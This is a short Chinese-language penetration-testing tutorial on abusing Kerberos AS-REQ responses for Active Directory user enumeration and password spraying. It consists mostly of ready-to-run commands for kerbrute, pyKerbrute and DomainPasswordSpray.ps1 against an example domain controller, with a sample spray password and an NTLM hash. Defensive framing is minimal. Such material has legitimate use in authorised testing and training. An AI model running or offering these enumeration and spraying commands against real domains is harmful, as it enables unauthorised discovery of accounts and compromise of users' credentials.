一、背景介绍
在 Kerberos 协议认证的 AS-REQ 阶段,当用户不存在时,返回包提示错误;当用户名存在时,密码正确和密码错误时,AS-REP 的返回包不一样。利用这一点,可以进行域内用户枚举和密码喷洒攻击。
二、域内用户枚举
kerbrute
GitHub: https://github.com/ropnop/kerbrute/releases
下载地址:https://github.com/ropnop/kerbrute/releases
使用示例:
<code>.\kerbrute_windows_amd64.exe userenum --dc 192.168.30.12 -d test.com .\user.txt</code>
pyKerbrute
GitHub: https://github.com/3gstudent/pyKerbrute
下载地址:https://github.com/3gstudent/pyKerbrute
使用示例:
<code>python2 EnumADUser.py 192.168.30.12 test.com user.txt udp 或 python2 EnumADUser.py 192.168.30.12 test.com user.txt tcp</code>
三、密码喷洒攻击
kerbrute
<code>.\kerbrute_windows_amd64.exe passwordspray --dc 192.168.30.12 -d test.com .\user.txt passw12#</code>
pyKerbrute
明文密码喷洒
<code>python2 ADPwdSpray.py 192.168.30.12 test.com user.txt clearpassword passw12# tcp</code>
哈希密码喷洒
<code>python2 ADPwdSpray.py 192.168.30.12 test.com user.txt ntlmhash F6502CBE4802F94AB472288970C124CD udp</code>
DomainPasswordSpray.ps1
GitHub: https://github.com/dafthack/DomainPasswordSpray
下载地址:https://github.com/dafthack/DomainPasswordSpray
使用示例:
mathematica
<code>Import-Module .\DomainPasswordSpray.ps1 Invoke-DomainPasswordSpray -Password 密码</code>
© 版权声明
THE END
暂无评论内容